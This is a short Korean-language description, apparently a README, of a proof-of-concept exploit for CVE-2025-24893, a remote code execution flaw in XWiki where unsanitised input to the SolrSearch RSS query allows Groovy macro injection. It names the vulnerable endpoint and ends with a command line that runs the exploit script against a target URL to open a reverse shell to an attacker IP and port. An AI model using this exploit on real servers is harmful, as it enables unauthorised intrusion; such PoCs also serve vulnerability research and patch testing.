
CVE-2025-24893용 리버스 셸 페이로드
CVE-2025-24893 PoC – XWiki
<groovy>매크로 원격 코드 실행
Artemir의 원본 PoC에서 영감을 받음
이것은 취약한 버전의 XWiki에서 원격 코드 실행(RCE) 취약점인 CVE-2025-24893에 대한 개념 증명(PoC) 익스플로잇입니다.
이 결함은 SolrSearch 엔드포인트 내에서 사용자 입력의 부적절한 삭제(sanitization)에 있으며, RSS 피드 쿼리를 통해 샌드박스되지 않은 <groovy> 매크로 주입에 취약합니다.
이 스크립트는 async 매크로를 사용하여 Groovy 페이로드를 주입하여 서버에서 명령 실행을 유발하며, 공격자가 자신의 시스템으로 리버스 셸을 트리거할 수 있게 합니다.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>